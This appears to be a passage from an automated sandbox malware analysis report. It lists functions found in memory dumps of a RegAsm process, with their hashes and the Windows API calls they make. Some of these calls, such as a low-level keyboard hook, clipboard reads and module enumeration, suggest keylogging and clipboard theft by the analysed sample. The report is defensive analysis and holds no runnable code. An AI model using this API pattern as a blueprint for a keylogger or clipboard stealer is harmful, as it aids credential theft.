Opcode Fuzzy Hash: 0fed1637aa1c770b8bccb6b493056e99386d58549eaf2b181ffbfe4e256ca386
Instruction Fuzzy Hash: FC8181F1E001168FEB25CB68C8A0ABEFBB6EB45310F148466D45DEB285C635DC51CBE1

Function 014AB3E0 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042745de61a4cd7be840edd0b18c2916e0d71f5d38fccf117691edeee016d888
Instruction ID: ec3eae9837c87736d956f4fe43fbbf7a6935cba66c9a8b9fb909541fa0b2b7f1
Opcode Fuzzy Hash: 042745de61a4cd7be840edd0b18c2916e0d71f5d38fccf117691edeee016d888
Instruction Fuzzy Hash: D8C109B182174D8BE718CF64E84E2897F71FBA1314F506799E1626B2D0DFB41646CF48

Function 014AB258 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bfcaa06a438f3f7883c9f0e65cde04ff9d9e545fe53789f4031eb7fc462d569
Instruction ID: ab3ca3f63398930549f3007931a95f73633e053b537ad2a8a797b0baba5ccaa0
Opcode Fuzzy Hash: 3bfcaa06a438f3f7883c9f0e65cde04ff9d9e545fe53789f4031eb7fc462d569
Instruction Fuzzy Hash: C3918135E1031ADFCB04DFA4D8949DDBBBAFFA9310F558216E506AB260DB30A941CF90

Function 014AC9F0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ec4a7df3ab3ae65c3a3ad5101f54f4c1bc06539d6ee2e0df2e2dd0cd9cd5d8e
Instruction ID: 9872b81d354707321a899a3975db0ab54eec0990f63c33604eb718e80943326b
Opcode Fuzzy Hash: 2ec4a7df3ab3ae65c3a3ad5101f54f4c1bc06539d6ee2e0df2e2dd0cd9cd5d8e
Instruction Fuzzy Hash: 54918135E0030ADFCB04DFA4D8949DEBBBAFF99310F558216E516AB260DB309841CF90

Function 07305ECC Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3875758566.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7300000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7dd60af5d7d61c02a303d9a65c18d8eab09a3ebfc413d082d51f55862ac2abb
Instruction ID: 845605d828e84d8d36c2befd06db2df62f8ec17f7d938b34d13055b5262ddf2f
Opcode Fuzzy Hash: a7dd60af5d7d61c02a303d9a65c18d8eab09a3ebfc413d082d51f55862ac2abb
Instruction Fuzzy Hash: 2521282215F3C34AD346ABB8E4119EABF75690323133CA1EBD0844EC83C72595B8D7A6

Function 055445F8 Relevance: 2.5, Strings: 2, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

O, xrefs: 05544615
O, xrefs: 05544621

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID: O$O
API String ID: 0-2467081800
Opcode ID: cc54a94baceb3fa6e2866686a5abdffa2ebf252f850f1386ba6e86405d3bfb5a
Instruction ID: 3d6f8d7745fbf9951aee18a1fc3a1f16fbe38c08e6d277fad1a0a447013f9735
Opcode Fuzzy Hash: cc54a94baceb3fa6e2866686a5abdffa2ebf252f850f1386ba6e86405d3bfb5a
Instruction Fuzzy Hash: 77014973E08B408BDB11AA38E4223D93BE1FFC6218F0949ABC0C8DB691D356C4058386

Function 014ABD78 Relevance: 1.7, APIs: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3295bc9c251660025687a20caf0e576ab92fe94540cfb4966e67335a60f8987f
Instruction ID: 4df616dd3682f8bdca23e751b20057f193de96568a2121e7d1a80679ad4d03a2
Opcode Fuzzy Hash: 3295bc9c251660025687a20caf0e576ab92fe94540cfb4966e67335a60f8987f
Instruction Fuzzy Hash: CA51EF71C00209AFDB15CFA9C980ADEBFB6FF48310F65812AF918AB220D7719951CF90

Function 0737A22C Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleFileNameExA.KERNEL32(?,?,?,?), ref: 0737A339

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 00f46953be22001dba57fbcc11ba60e3619ea4a31c0ec538836ccb1d5e078f1b
Instruction ID: f6d03630fd78d9955dc88d809eed513fe1e9941963759f7b8b4cb2caf1172a5b
Opcode Fuzzy Hash: 00f46953be22001dba57fbcc11ba60e3619ea4a31c0ec538836ccb1d5e078f1b
Instruction Fuzzy Hash: 364145B0D14359CFEB24CFA9C894B9EBBB1BF48314F14C029E819AB250D7799885CF91

Function 014ABDD8 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014ABEEA

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4e9bd0a943e68a29f1364579ec8ab13a8ea96ceb0d0a172dc05cac221bd534ef
Instruction ID: 1c0ef65861a8c6ac7aa7a13ec6e741054de7f2b3f22099cff62c620b29c4da2b
Opcode Fuzzy Hash: 4e9bd0a943e68a29f1364579ec8ab13a8ea96ceb0d0a172dc05cac221bd534ef
Instruction Fuzzy Hash: 2641BDB1D00309DFDB14CFAAC884ADEBBB5FF48310F65812AE919AB220D7719845CF90

Function 0737A238 Relevance: 1.6, APIs: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleFileNameExA.KERNEL32(?,?,?,?), ref: 0737A339

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: a146399b917495026bfccc9327e744ef49c03e21c41d4eb895f96d7d862bcdc5
Instruction ID: fb755a9176f7fc2efc5f3ab7a83cb516c2f702477fb4e06f49300341a3a46bde
Opcode Fuzzy Hash: a146399b917495026bfccc9327e744ef49c03e21c41d4eb895f96d7d862bcdc5
Instruction Fuzzy Hash: 6F4125B0D143598FEB24CFA9C894B9EBBB1BF48314F14C429E819AB250DB799845CF91

Function 06FA1E14 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06FA3751

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 6d63e7010d7fde7f86aede7ececb97f928059e261c3ac2a98b1ff88262ffc5b4
Instruction ID: 577872ffda47b48c95ef026dbad412fb46d9349184c1bf80a0c2b2632d4d534f
Opcode Fuzzy Hash: 6d63e7010d7fde7f86aede7ececb97f928059e261c3ac2a98b1ff88262ffc5b4
Instruction Fuzzy Hash: 89414CB9900309CFDB54CF99C888B9ABBF5FF88314F248459E519AB321D775A845CFA0

Function 06FA46AD Relevance: 1.6, APIs: 1, Instructions: 79
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06FA4740

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: cde320ea09e923974108c7ed361d2fcb278299d498cdfdc833b7be708468af24
Instruction ID: ef08e242cdfe562b6d8ec14eef40e34b82e121cd8424d0b390999afe8cbc3a60
Opcode Fuzzy Hash: cde320ea09e923974108c7ed361d2fcb278299d498cdfdc833b7be708468af24
Instruction Fuzzy Hash: 143102B0D01349DFDB14CF99C984BDEBBF5AF88704F248019E404AB290DBB4A845CBA1

Function 06FA4068 Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06FA4740

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 13078c0b62da2afe4782270c574d947904e525a606e7c9d239c6bc101e2e2a20
Instruction ID: 1faf46dd8cbb227aa7897a0df493dd6e8fe87f22be07d81e46d21c7322fc8e54
Opcode Fuzzy Hash: 13078c0b62da2afe4782270c574d947904e525a606e7c9d239c6bc101e2e2a20
Instruction Fuzzy Hash: 003111B4D01349DFEB50DF99C984B9DBBF5AF49704F248019E404BB390DBB4A845CBA5

Function 06FA27F1 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06FA287F

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b77a93b6e7504207fff21bf64c9f3a0259f1220e30ccc3ef5fe3a6e192bcc65d
Instruction ID: c8c7f223624f2c259bc59d165e5dad7a8b6ec6d374f857ec5128fae5d22fd516
Opcode Fuzzy Hash: b77a93b6e7504207fff21bf64c9f3a0259f1220e30ccc3ef5fe3a6e192bcc65d
Instruction Fuzzy Hash: FD2105B5D00349AFDB10CFAAD884ADEBFF9EB48320F14841AF914A7210D774A940CFA0

Function 0737A162 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32EnumProcessModules.KERNEL32(?,00000000,?,?), ref: 0737A1EE

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: b2e0e6ca2e2d996f1d3d31bfc709a0a9039203e35c6c4157cb526f5ace0cdfcd
Instruction ID: 7ecab45cdbd1b188b7747e6dc55afe7131808af2345cca6b2663f9b47a7de27f
Opcode Fuzzy Hash: b2e0e6ca2e2d996f1d3d31bfc709a0a9039203e35c6c4157cb526f5ace0cdfcd
Instruction Fuzzy Hash: 422128B5D012199FDB10CF9AD881BDEFBF4BB48720F10852AE818A7340D378A944CFA0

Function 0737A168 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32EnumProcessModules.KERNEL32(?,00000000,?,?), ref: 0737A1EE

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: f62ea88de1823e529396f900f38058b6f9bdc9e39455c18873076580977a8150
Instruction ID: 2354255da2ed83259ec144362209034346368420131568b57e1e9d5866e34dbf
Opcode Fuzzy Hash: f62ea88de1823e529396f900f38058b6f9bdc9e39455c18873076580977a8150
Instruction Fuzzy Hash: D621F8B5D012199FDB10CF9AC885BDEFBB4BB48710F10852AE918A7240D378A954CBA0

Function 06FA27F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06FA287F

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: cb0df4c57d80a406866848683775c8f01379a9f95227f7068095eeab34e38332
Instruction ID: 7db61e1f990f072cef8b06522b519b12bf64823c9cacfcb097cbdba52f3fc1d4
Opcode Fuzzy Hash: cb0df4c57d80a406866848683775c8f01379a9f95227f7068095eeab34e38332
Instruction Fuzzy Hash: 4B21E4B5D003499FDB10CFAAD984ADEBBF4FB48720F14841AE918A7310D378A944CFA0

Function 06FA4841 Relevance: 1.6, APIs: 1, Instructions: 62fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 06FA48B8

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 46e958d18af013a41b1a411cd8f5c3310561fcfdf4a6b43ed8d4f870911dabc8
Instruction ID: 0371e9a1b59340127a50ac5c6a6421d01b80815c1292c38405daa91412d68fac
Opcode Fuzzy Hash: 46e958d18af013a41b1a411cd8f5c3310561fcfdf4a6b43ed8d4f870911dabc8
Instruction Fuzzy Hash: 4E2149B1C0065A9BCB10CF9AD844BDEFBF4AF48620F148129E814A7240D7B8A944CFE1

Function 06FAC0D9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06FABC68,00000000,00000000), ref: 06FAC15B

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: f997917c909a6d0faf8e80178b8316ca069a997349c2c8bb905b1f2c004c470a
Instruction ID: d77c15e1e29a487ffe26d4b0c6a24295c6a8e7450d3be66e1638553f99c36d3e
Opcode Fuzzy Hash: f997917c909a6d0faf8e80178b8316ca069a997349c2c8bb905b1f2c004c470a
Instruction Fuzzy Hash: 4E2135B5D002499FDB54DFAAD844BEEFBF5AF88320F14842AE418A7350D774A944CFA1

Function 06FA4084 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 06FA48B8

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: b9e5089c25c55f9d968106d8adcf7dad762e4e6c3732c536f5c9254786ee61f9
Instruction ID: 945b21ad4f956d53925e171200de9197c1530ac73f332c8058bda8625a6c9951
Opcode Fuzzy Hash: b9e5089c25c55f9d968106d8adcf7dad762e4e6c3732c536f5c9254786ee61f9
Instruction Fuzzy Hash: 662144B1C0465A9FCB10CF9AD4447AEFBF4EF48720F14812AE818A7240D7B8A944CFE0

Function 07308A58 Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0730867A,00000000,00000000,040B41CC,030EC724), ref: 07308AC8

Memory Dump Source

Source File: 00000002.00000002.3875758566.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7300000_RegAsm.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 9bc3f22bef315d123a0ecfb0affb8679b8b3b5f72fe8bde5457ad6d1a9ca5b15
Instruction ID: 26506b6f602cc8da5c78665e47d8e2eb83239fdcb3aec573a07a54d883872cf3
Opcode Fuzzy Hash: 9bc3f22bef315d123a0ecfb0affb8679b8b3b5f72fe8bde5457ad6d1a9ca5b15
Instruction Fuzzy Hash: 582129B68003599FDB10CFAAD944BDEFBF4EB48320F14842AE518A7651C378A555CFA1

Function 07377EE0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 07377F4F

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 706a8b7db9ff6df7341f734531a174a7685135bdc1254d56b29658e729d1c8ea
Instruction ID: 5cc09b55603cc04d755c2e002d292ea813a1293118adde50cf891ba65ee18462
Opcode Fuzzy Hash: 706a8b7db9ff6df7341f734531a174a7685135bdc1254d56b29658e729d1c8ea
Instruction Fuzzy Hash: D51144B2C0065A9BDB10DFAAD5447DEFBF4AF48720F14852AE818A7240D778A945CFA1

Function 07307500 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0730867A,00000000,00000000,040B41CC,030EC724), ref: 07308AC8

Memory Dump Source

Source File: 00000002.00000002.3875758566.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7300000_RegAsm.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 847555a9c1a023b0a130979df744d8e0fea2133d39e7c708cee3d969d1e9dca9
Instruction ID: dda6726d89ae9a371760ccdc3f8000f32960ea0b14933a7112300a821bca09fb
Opcode Fuzzy Hash: 847555a9c1a023b0a130979df744d8e0fea2133d39e7c708cee3d969d1e9dca9
Instruction Fuzzy Hash: 5C1117B580024DDFDB10CF9AD944BEEBBF8EB48320F148429E918A7650D378A954CFA5

Function 07377EE8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 07377F4F

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: ef0bfcc0c98772e1bbc942125592c645eced6a05ac23a805244d1f48e6e54361
Instruction ID: 315aeca9e3bef00362b4d96e2281c5b4bb656ead82152be06c94b7007912410f
Opcode Fuzzy Hash: ef0bfcc0c98772e1bbc942125592c645eced6a05ac23a805244d1f48e6e54361
Instruction Fuzzy Hash: B611F3B1C0065A9FDB10DFAAC544BDEFBF4AF48720F15852AE818B7240D778A944CFA5

Function 014AA358 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 014AA3C6

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 83d2269479d076e66f5053701c6cea09cadb9fd98d6ab2005c2fbacbc50a9d28
Instruction ID: 9adda41428235d89306ca403d44b586546ff7d40f3405544c55fcc600b6c69f6
Opcode Fuzzy Hash: 83d2269479d076e66f5053701c6cea09cadb9fd98d6ab2005c2fbacbc50a9d28
Instruction Fuzzy Hash: F61113B6C003598FDB14CFAAD944BDEFBF4AF48224F15841AD419B7610C3B8A545CFA1

Function 014A938C Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 014AA3C6

Memory Dump Source

Source File: 00000002.00000002.3869099903.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6511cc1844f944e63359252fb2150b065a04c03798bc0b02d03ef58005e2f6a3
Instruction ID: 56dabf969b6d8fcefdb71c6a2cedf8d9bbd80e42fdfdb3ce8903adf336bd7a7a
Opcode Fuzzy Hash: 6511cc1844f944e63359252fb2150b065a04c03798bc0b02d03ef58005e2f6a3
Instruction Fuzzy Hash: BD1132B5C007498FDB10DF9AD844B9EFBF4EB88220F65841AD818B7310C3B9A545CFA0

Function 06FA4568 Relevance: 1.6, APIs: 1, Instructions: 50comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06FA45C5

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 879a18a06436e0249136410569476a047adc28a6691e9f318d3332d569b6f071
Instruction ID: 773b167f3a5a81ea7ccb25d9ce3f3370df30273dd40b296d7a486a4a3bae883c
Opcode Fuzzy Hash: 879a18a06436e0249136410569476a047adc28a6691e9f318d3332d569b6f071
Instruction Fuzzy Hash: 9E1133B58007498FCB20DFAAD845BCEBFF8EB48724F108819E518A7600C774A984CFA5

Function 06FA3C61 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06FA3C3D), ref: 06FA3CC7

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d7a410d97d4720098910b675cca08e4c4c237e557e61c4792f71ea7e34937554
Instruction ID: 1fabfc6ee15be4b2e88531633bb908543e5842eee4ed039a101ff310a93f1a52
Opcode Fuzzy Hash: d7a410d97d4720098910b675cca08e4c4c237e557e61c4792f71ea7e34937554
Instruction Fuzzy Hash: 281136B5C003499FCB20DF9AD844BDEBFF4AF48720F108419E518A7250C774A544CFA1

Function 06FA2034 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06FA45C5

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a602bb3c53f14a369d8302e5c570eb334f8282865dccf79b9c0ada4349c50563
Instruction ID: e958a71a8fa2c3c54dbb7c23ac8822896d3621f4b52f3be55d695c39aef3319f
Opcode Fuzzy Hash: a602bb3c53f14a369d8302e5c570eb334f8282865dccf79b9c0ada4349c50563
Instruction Fuzzy Hash: 771115B5C007498FDB20DFAAD444B9EBBF4EB48624F148819E518A7610D7B4A944CFA5

Function 06FA1E6C Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06FA3C3D), ref: 06FA3CC7

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 810e2db117343eb6f4cabbb29b08369ce6fca8a5e99abca796984f57c98c2569
Instruction ID: a147da6d08eba54826788b1f87b9ba8875f5ee30ccb4c728b3dba324f0e31e4b
Opcode Fuzzy Hash: 810e2db117343eb6f4cabbb29b08369ce6fca8a5e99abca796984f57c98c2569
Instruction Fuzzy Hash: 641103B1D003598FDB20DF9AD984B9EBBF4EB48724F20841AE518A7350C774A944CFA5

Function 055432B0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 780d69310d15ff16ffe71674445554bb4a81c56bd29f66b08d369de0b043fd7c
Instruction ID: 317ccc6ffd922c7ccd80302336a38aaaba3818f4985811c5ccbfe623f7fa53fc
Opcode Fuzzy Hash: 780d69310d15ff16ffe71674445554bb4a81c56bd29f66b08d369de0b043fd7c
Instruction Fuzzy Hash: E5718E31D043498FCB10DFA9D884AEEFBF1FF48314F11896AE459A7220EB34A985CB50

Function 055439E8 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d33b33b94a22df793bfc902438c0719ad4aa98d3095cfa8d245b4ab5a2b230f2
Instruction ID: 9e893e847152625845327f343d9a5f85cf637ba4ea67420dc61c817caf03b473
Opcode Fuzzy Hash: d33b33b94a22df793bfc902438c0719ad4aa98d3095cfa8d245b4ab5a2b230f2
Instruction Fuzzy Hash: C1411631B043455FDB099F79982066F7BE6EFC5200B1585AAD80ACB281EE35DD01C7A1

Function 055461A9 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff3a7dc7cf3a45455332f5ca298d945856737f0c6e54d5dc87e42b49788b6e0
Instruction ID: 920ec07e3d60c989273d9460818c9f3963ba726273c31f407f07337a680aff41
Opcode Fuzzy Hash: 5ff3a7dc7cf3a45455332f5ca298d945856737f0c6e54d5dc87e42b49788b6e0
Instruction Fuzzy Hash: 744125B09043089FDB24DFAAC588B8DBBF1FF49714F24852AE445AB290C7759846CF91

Function 05542B3C Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
